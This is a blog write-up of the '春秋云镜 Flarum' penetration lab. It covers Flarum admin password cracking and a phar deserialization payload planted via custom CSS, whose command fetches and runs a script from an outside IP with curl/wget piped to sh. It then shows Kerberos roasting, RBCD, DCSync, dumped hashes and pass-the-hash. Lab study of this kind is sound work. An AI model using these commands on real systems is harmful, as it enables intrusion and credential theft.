fffffilm's learning

春秋云镜-Flarum

  1. 春秋云镜-Flarum
    1. flag01
      1. www-data
      2. root
    2. flag03
      1. AS—REP Roasting
      2. Acount Operators
    3. flag04
    4. flag02

渗透

春秋云镜-Flarum

flag01

请测试 Flarum 社区后台登录口令的安全性,并获取在该服务器上执行任意命令的能力。

www-data

fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
fscan -h 39.99.138.155

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.138.155:80 open
39.99.138.155:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.138.155      code:200 len:5882   title:霄壤社区
已完成 2/2
[*] 扫描结束,耗时: 49.663807s

只有22和80端口,那先看80,通过Wappalyzer知道是一个Flarum论坛

image-20250311124301138

发现存在一个后台RCE的洞,那现在的问题就是如何登录后台了。题目描述说了是弱口令

根据主页提示,用户名为administrator,邮箱为administrator@xiaorang.lab

用rockyou.txt可以爆破到密码1chris(要爆一万多条,难崩

利用phpggc生成命令

1
./phpggc -p tar -b Monolog/RCE6 system "(curl -fsSL -m180 http://156.238.233.55:39001/slt||wget -T180 -q http://156.238.233.55:39001/slt)|sh"

然后后台管理->外观->自定义CSS

写入@import (inline) 'data:text/css;base64,xxx';

1
@import (inline) 'data:text/css;base64,dGVzdC50eHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NDQAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDA0ADAwMDAwMDAwMDAwADAwMDYyMTcgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0ZXN0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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tY3P43oJbNmzPGsmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';

image-20250311125815031

保存。可以访问一下forum.css来确认有没有写入phar,如果没有可能需要访问一下主页/

可以看到我们这里是有的

image-20250311155018662

然后再修改css,使用phar协议包含我们之前改的css

1
2
3
.test {
    content: data-uri('phar://./assets/forum.css');
}

image-20250311125902763

成功上线

image-20250311130005568

现在是www-data权限,但是要root权限才能读到flag

root

发现capabilities提权。直接用openssl读取文件即可

image-20250311130909202

flag01: flag{8c0af361-122e-4743-8e78-4594eff3ee60}

也可以像这篇文章里面讲的那样,起一个web服务然后做到任意人家读取。Linux提权之:利用capabilities提权 - f_carey - 博客园

flag03

通过kerberos攻击的获取域内权限,并进行信息收集。

请尝试获取内网中Fileserver主机的权限,并发现黑客留下的域控制器后门。

扫一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
./fscan -h 172.22.60.52/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.60.8     is alive
(icmp) Target 172.22.60.15    is alive
(icmp) Target 172.22.60.42    is alive
(icmp) Target 172.22.60.52    is alive
[*] Icmp alive hosts len is: 4
172.22.60.42:445 open
172.22.60.52:80 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.15:445 open
172.22.60.8:445 open
172.22.60.8:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.8:88 open
172.22.60.52:22 open
[*] alive ports len is: 12
start vulscan
[*] NetBios 172.22.60.15    XIAORANG\PC1                  
[*] NetInfo 
[*]172.22.60.8
   [->]DC
   [->]172.22.60.8
   [->]169.254.56.151
[*] NetBios 172.22.60.8     [+] DC:XIAORANG\DC             
[*] NetInfo 
[*]172.22.60.42
   [->]Fileserver
   [->]172.22.60.42
   [->]169.254.52.194
[*] NetBios 172.22.60.42    XIAORANG\FILESERVER           
[*] NetInfo 
[*]172.22.60.15
   [->]PC1
   [->]172.22.60.15
   [->]169.254.57.196
[*] WebTitle http://172.22.60.52       code:200 len:5867   title:霄壤社区

总结一下

172.22.60.8 DC:XIAORANG\DC

172.22.60.15 XIAORANG\PC1

172.22.60.42 XIAORANG\FILESERVER

172.22.60.52 外网

AS—REP Roasting

翻到数据库配置文件后连接数据库

image-20250311131746496

挂上代理然后连接

image-20250311132118489

导出flarum_users表里面的email列。(或者username列也行)

image-20250311132303437

这里改成none,就可以得到这样的数据了

image-20250311132352311

然后开始域用户枚举,这里kerbrute好像走不了proxychians代理,所以我们把它拿到靶机上来用

1
./kerbrute_linux_amd64 userenum --dc 172.22.60.8  -d xiaorang.lab flarum_users.txt

image-20250311160117057

现在拿到了9个账号再用这些账号来进行AS—REP Roasting攻击

1
proxychains -q python3 GetNPUsers.py -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile user.txt

image-20250311160708658

得到两个哈希,用hashcat爆破一下

1
hashcat hash.txt rockyou.txt

image-20250311160930530

爆出来一个密码:wangyun\Adm12geC

Acount Operators

利用这个账号密码做一个域信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
proxychains -q python bloodhound.py -u wangyun -p Adm12geC -d xiaorang.lab -dc DC.xiaorang.lab -ns 172.22.60.8 -c all --auth-method ntlm --dns-tcp --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: DC.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC.xiaorang.lab
INFO: Found 12 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: fileserver.xiaorang.lab
INFO: Querying computer: PC1.xiaorang.lab
INFO: Querying computer: DC.xiaorang.lab
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc000018d - STATUS_TRUSTED_RELATIONSHIP_FAILURE - The logon request failed because the trust relationship between this workstation and the primary domain failed.
INFO: Done in 00M 17S
INFO: Compressing output into 20250311161309_bloodhound.zip

image-20250311195024160

发现zhangxin@xiaorang.lab 用户属于 Account Operators 组的成员:但是我们现在还登录不了他。

先看看wangyun能登录哪个主机

1
2
3
4
5
6
7
8
proxychains -q netexec rdp 172.22.60.52/24 -u wangyun -p Adm12geC
RDP         172.22.60.42    3389   Fileserver       [*] Windows 10 or Windows Server 2016 Build 17763 (name:Fileserver) (domain:xiaorang.lab) (nla:True)
RDP         172.22.60.42    3389   Fileserver       [-] xiaorang.lab\wangyun:Adm12geC 
RDP         172.22.60.8     3389   DC               [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:xiaorang.lab) (nla:True)
RDP         172.22.60.15    3389   PC1              [*] Windows 10 or Windows Server 2016 Build 17763 (name:PC1) (domain:xiaorang.lab) (nla:True)
RDP         172.22.60.8     3389   DC               [+] xiaorang.lab\wangyun:Adm12geC 
RDP         172.22.60.15    3389   PC1              [+] xiaorang.lab\wangyun:Adm12geC (Pwn3d!)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

可以看到成功登录PC1。那我们使用wangyun@xiaorang.lab\Adm12geC账号rdp上去

发现桌面上有个xshell

image-20250311165632110

打开可以发现里面有个会话储存了zhangxin的密码,但是我这里不知道为什么打不开xshell。

利用https://github.com/JDArmy/SharpXDecrypt这个工具提取xshell存储的密码

image-20250311170323414

可以看到已经提取出来xshell里面储存的密码。那么接下来就是打一个rbcd了。直接用rbcd打的Fileserver,也可以打PC1,但是这里打Fileserver然后再拿域控回来看PC1更方便一点。

添加机器账号

1
proxychains -q impacket-addcomputer xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass 'Password@973'

image-20250311170902508

修改msDS-AllowedToActOnBehalfOfOtherIdentity

1
proxychains -q impacket-rbcd xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'hacker$'

申请银票据

1
proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8

导入票据

1
export KRB5CCNAME=Administrator@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache

修改host

1
2
3
172.22.60.15 PC1.xiaorang.lab
172.22.60.42 FILESERVER.xiaorang.lab
172.22.60.8  XIAORANG\DC

PTT

1
proxychains -q python3 smbexec.py -no-pass -k PC1.xiaorang.lab

image-20250311171726317

flag03: flag{6fbc61b2-5328-4b56-a62d-3d22fce75600}

flag04

请尝试利用黑客留下的域控制器后门获取域控的权限。

发现FILESERVER.XIAORANG.LAB有DCSync权限,也就是题目描述里面说到的后门

image-20250311180602183

抓一下FILESERVER哈希

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
proxychains -q python3 secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM 
 0000   8B 14 51 59 D7 67 45 80  9F 4A 54 4C 0D E1 D3 29   ..QY.gE..JTL...)
 0010   3E B6 CC 22 FF B7 C5 74  7F E4 B0 AD E7 FA 90 0D   >.."...t........
 0020   1B 77 20 D5 A6 67 31 E9  9E 38 DD 95 B0 60 32 C4   .w ..g1..8...`2.
 0030   BE 8E 72 4D 0D 90 01 7F  01 30 AC D7 F8 4C 2B 4A   ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

然后直接dump域控哈希就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
proxychains -q python3  secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes :951d8a9265dfb652f42e5c8c497d70dc -dc-ip 172.22.60.8 -just-dc-ntlm 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:98194d49adfe247020eaade4a3936d95:::
chenfang:1105:aad3b435b51404eeaad3b435b51404ee:302b5743b0f7b3436591aedf550ded5b:::
zhanghao:1106:aad3b435b51404eeaad3b435b51404ee:4c37e7a022daf856bfa2b16824696ab5:::
wangyun:1107:aad3b435b51404eeaad3b435b51404ee:561d64b9a1c943db32810fb5586a4be9:::
zhangwei:1108:aad3b435b51404eeaad3b435b51404ee:3d2f864635abb31f2546dc07cbcd2528:::
wangkai:1109:aad3b435b51404eeaad3b435b51404ee:d20a47a4529552805d96a24c3020384c:::
yangyan:1110:aad3b435b51404eeaad3b435b51404ee:4f80f967fd586f4212bc264a7d1f6789:::
zhangxin:1111:aad3b435b51404eeaad3b435b51404ee:38780e101b28bb9b9036fc3e2e4f35e6:::
wangping:1112:aad3b435b51404eeaad3b435b51404ee:0adf6fb0f808be95d449e3b6c67b02dc:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:ea1a6058127a1d322ced63b59b6d92e5:::
PC1$:1103:aad3b435b51404eeaad3b435b51404ee:57eb8022770c8fb3adadaee4d62c313b:::
FILESERVER$:1114:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
hacker$:1116:aad3b435b51404eeaad3b435b51404ee:ad123012e39b20a80ebe424bff56e1b4:::
[*] Cleaning up...

PTH

1
proxychains -q python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.8 -codec gbk

type C:\users\administrator\flag\flag04.txt

image-20250311192343463

flag04: flag{f9e06ba0-6108-4123-af9d-3f3a54775d2f}

flag02

PTH

1
proxychains -q python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.15 -codec gbk

type C:\users\administrator\flag\flag02.txt

image-20250311192438318

flag02: flag{df47b693-f3a8-4ecc-8c23-5437eb2fe0a5}

参考文章:

文章 - 内网打靶——春秋云镜篇(7)–Flarum - 先知社区

Flarum - 春秋云境 | h0ny’s blog

春秋云镜 - Flarum - Lxxx

春秋云境·Flarum – fushulingのblog

渗透